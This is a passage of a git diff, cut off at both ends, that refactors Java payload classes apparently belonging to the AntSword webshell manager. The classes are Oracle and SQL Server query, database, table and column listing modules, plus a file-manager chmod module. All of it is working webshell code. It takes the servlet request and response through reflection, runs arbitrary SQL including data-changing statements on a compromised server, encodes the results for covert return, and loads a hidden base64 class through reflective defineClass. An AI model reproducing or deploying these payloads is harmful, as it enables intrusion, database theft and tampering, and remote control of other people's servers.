java.sql.ResultSet; -import java.sql.ResultSetMetaData; +import java.sql.*; public class Query { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; String varkey1 = "antswordargencode"; @@ -93,7 +64,7 @@ String Base64Encode(String str) { String ret = ""; if (version.compareTo("1.9") >= 0) { Class Base64 = Class.forName("java.util.Base64"); - Object Encoder = Base64.getMethod("getEncoder", new Class[0]).invoke(Base64, new Object[]{}); + Object Encoder = Base64.getMethod("getEncoder", new Class[0]).invoke(Base64); ret = (String) Encoder.getClass().getMethod("encodeToString", byte[].class).invoke(Encoder, str.getBytes()); } else { Class Base64 = Class.forName("sun.misc.BASE64Encoder"); @@ -115,23 +86,36 @@ String executeSQL(String encode, String conn, String sql, String columnsep, Stri String url = x[1]; Connection c = DriverManager.getConnection(url, x[2], x[3]); Statement stmt = c.createStatement(); - ResultSet rs = stmt.executeQuery(sql); - ResultSetMetaData rsmd = rs.getMetaData(); + boolean isRS = stmt.execute(sql); + if (isRS) { + ResultSet rs = stmt.getResultSet(); + ResultSetMetaData rsmd = rs.getMetaData(); - if (needcoluname) { - for (int i = 1; i <= rsmd.getColumnCount(); i++) { - String columnName = rsmd.getColumnName(i); - ret += columnName + columnsep; + if (needcoluname) { + for (int i = 1; i <= rsmd.getColumnCount(); i++) { + String columnName = rsmd.getColumnName(i); + ret += columnName + columnsep; + } + ret += rowsep; } - ret += rowsep; - } - while (rs.next()) { - for (int i = 1; i <= rsmd.getColumnCount(); i++) { - String columnValue = rs.getString(i); - ret += Base64Encode(columnValue) + columnsep; + while (rs.next()) { + for (int i = 1; i <= rsmd.getColumnCount(); i++) { + String columnValue = rs.getString(i); + ret += Base64Encode(columnValue) + columnsep; + } + ret += rowsep; + } + } else { + ret += "Result" + columnsep + rowsep; + int rowCount = stmt.getUpdateCount(); + if (rowCount > 0) { + ret += Base64Encode("Rows changed = " + rowCount) + columnsep + rowsep; + } else if (rowCount == 0) { + ret += Base64Encode("No rows changed or statement was DDL command") + columnsep + rowsep; + } else { + ret += Base64Encode("False") + columnsep + rowsep; } - ret += rowsep; } return ret; } @@ -142,10 +126,42 @@ String query(String encode, String conn, String sql) throws Exception { return executeSQL(encode, conn, sql, columnsep, rowsep, true); } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/database/oracle/Show_columns.java b/src/database/oracle/Show_columns.java index e77f8b5..5c10cdb 100644 --- a/src/database/oracle/Show_columns.java +++ b/src/database/oracle/Show_columns.java @@ -3,49 +3,20 @@ import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.lang.reflect.Field; -import java.sql.DriverManager; -import java.sql.Connection; -import java.sql.Statement; -import java.sql.ResultSet; -import java.sql.ResultSetMetaData; +import java.sql.*; public class Show_columns { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; @@ -125,10 +96,42 @@ String showColumns(String encode, String conn, String dbname, String table) thro return executeSQL(encode, conn, sql, columnsep, rowsep, true); } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/database/oracle/Show_databases.java b/src/database/oracle/Show_databases.java index 14e24a3..a7cdad5 100644 --- a/src/database/oracle/Show_databases.java +++ b/src/database/oracle/Show_databases.java @@ -3,49 +3,20 @@ import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.lang.reflect.Field; -import java.sql.DriverManager; -import java.sql.Connection; -import java.sql.Statement; -import java.sql.ResultSet; -import java.sql.ResultSetMetaData; +import java.sql.*; public class Show_databases { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; String varkey1 = "antswordargencode"; @@ -120,10 +91,42 @@ String showDatabases(String encode, String conn) throws Exception { return executeSQL(encode, conn, sql, columnsep, rowsep, false); } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/database/oracle/Show_tables.java b/src/database/oracle/Show_tables.java index fb96947..28d6da3 100644 --- a/src/database/oracle/Show_tables.java +++ b/src/database/oracle/Show_tables.java @@ -3,49 +3,20 @@ import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.lang.reflect.Field; -import java.sql.DriverManager; -import java.sql.Connection; -import java.sql.Statement; -import java.sql.ResultSet; -import java.sql.ResultSetMetaData; +import java.sql.*; public class Show_tables { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; String varkey1 = "antswordargencode"; @@ -122,10 +93,42 @@ String showTables(String encode, String conn, String dbname) throws Exception { return executeSQL(encode, conn, sql, columnsep, rowsep, false); } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/database/sqlserver/Query.java b/src/database/sqlserver/Query.java index b982bcf..643830c 100644 --- a/src/database/sqlserver/Query.java +++ b/src/database/sqlserver/Query.java @@ -3,49 +3,20 @@ import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.lang.reflect.Field; -import java.sql.DriverManager; -import java.sql.Connection; -import java.sql.Statement; -import java.sql.ResultSet; -import java.sql.ResultSetMetaData; +import java.sql.*; public class Query { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; @@ -93,7 +64,7 @@ String Base64Encode(String str) { String ret = ""; if (version.compareTo("1.9") >= 0) { Class Base64 = Class.forName("java.util.Base64"); - Object Encoder = Base64.getMethod("getEncoder", new Class[0]).invoke(Base64, new Object[]{}); + Object Encoder = Base64.getMethod("getEncoder", new Class[0]).invoke(Base64); ret = (String) Encoder.getClass().getMethod("encodeToString", byte[].class).invoke(Encoder, str.getBytes()); } else { Class Base64 = Class.forName("sun.misc.BASE64Encoder"); @@ -115,23 +86,36 @@ String executeSQL(String encode, String conn, String sql, String columnsep, Stri String url = x[1]; Connection c = DriverManager.getConnection(url); Statement stmt = c.createStatement(); - ResultSet rs = stmt.executeQuery(sql); - ResultSetMetaData rsmd = rs.getMetaData(); + boolean isRS = stmt.execute(sql); + if (isRS) { + ResultSet rs = stmt.getResultSet(); + ResultSetMetaData rsmd = rs.getMetaData(); - if (needcoluname) { - for (int i = 1; i <= rsmd.getColumnCount(); i++) { - String columnName = rsmd.getColumnName(i); - ret += columnName + columnsep; + if (needcoluname) { + for (int i = 1; i <= rsmd.getColumnCount(); i++) { + String columnName = rsmd.getColumnName(i); + ret += columnName + columnsep; + } + ret += rowsep; } - ret += rowsep; - } - while (rs.next()) { - for (int i = 1; i <= rsmd.getColumnCount(); i++) { - String columnValue = rs.getString(i); - ret += Base64Encode(columnValue) + columnsep; + while (rs.next()) { + for (int i = 1; i <= rsmd.getColumnCount(); i++) { + String columnValue = rs.getString(i); + ret += Base64Encode(columnValue) + columnsep; + } + ret += rowsep; + } + } else { + ret += "Result" + columnsep + rowsep; + int rowCount = stmt.getUpdateCount(); + if (rowCount > 0) { + ret += Base64Encode("Rows changed = " + rowCount) + columnsep + rowsep; + } else if (rowCount == 0) { + ret += Base64Encode("No rows changed or statement was DDL command") + columnsep + rowsep; + } else { + ret += Base64Encode("False") + columnsep + rowsep; } - ret += rowsep; } return ret; } @@ -142,10 +126,42 @@ String query(String encode, String conn, String sql) throws Exception { return executeSQL(encode, conn, sql, columnsep, rowsep, true); } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/database/sqlserver/Show_columns.java b/src/database/sqlserver/Show_columns.java index a2841f2..df987d2 100644 --- a/src/database/sqlserver/Show_columns.java +++ b/src/database/sqlserver/Show_columns.java @@ -3,49 +3,20 @@ import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.lang.reflect.Field; -import java.sql.DriverManager; -import java.sql.Connection; -import java.sql.Statement; -import java.sql.ResultSet; -import java.sql.ResultSetMetaData; +import java.sql.*; public class Show_columns { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; String varkey1 = "antswordargencode"; @@ -124,10 +95,42 @@ String showColumns(String encode, String conn, String dbname, String table) thro return executeSQL(encode, conn, sql, columnsep, rowsep, true); } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/database/sqlserver/Show_databases.java b/src/database/sqlserver/Show_databases.java index 8e92d6e..7c84abe 100644 --- a/src/database/sqlserver/Show_databases.java +++ b/src/database/sqlserver/Show_databases.java @@ -3,49 +3,20 @@ import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.lang.reflect.Field; -import java.sql.DriverManager; -import java.sql.Connection; -import java.sql.Statement; -import java.sql.ResultSet; -import java.sql.ResultSetMetaData; +import java.sql.*; public class Show_databases { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; String varkey1 = "antswordargencode"; @@ -120,10 +91,42 @@ String showDatabases(String encode, String conn) throws Exception { return executeSQL(encode, conn, sql, columnsep, rowsep, false); } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/database/sqlserver/Show_tables.java b/src/database/sqlserver/Show_tables.java index dcc0aba..d4c6623 100644 --- a/src/database/sqlserver/Show_tables.java +++ b/src/database/sqlserver/Show_tables.java @@ -3,49 +3,20 @@ import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.lang.reflect.Field; -import java.sql.DriverManager; -import java.sql.Connection; -import java.sql.Statement; -import java.sql.ResultSet; -import java.sql.ResultSetMetaData; +import java.sql.*; public class Show_tables { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; String varkey1 = "antswordargencode"; @@ -122,10 +93,42 @@ String showTables(String encode, String conn, String dbname) throws Exception { return executeSQL(encode, conn, sql, columnsep, rowsep, false); } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/filemanager/Chmod.java b/src/filemanager/Chmod.java index 1c1dcc7..458ef5d 100644 --- a/src/filemanager/Chmod.java +++ b/src/filemanager/Chmod.java @@ -8,40 +8,15 @@ public class Chmod { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) 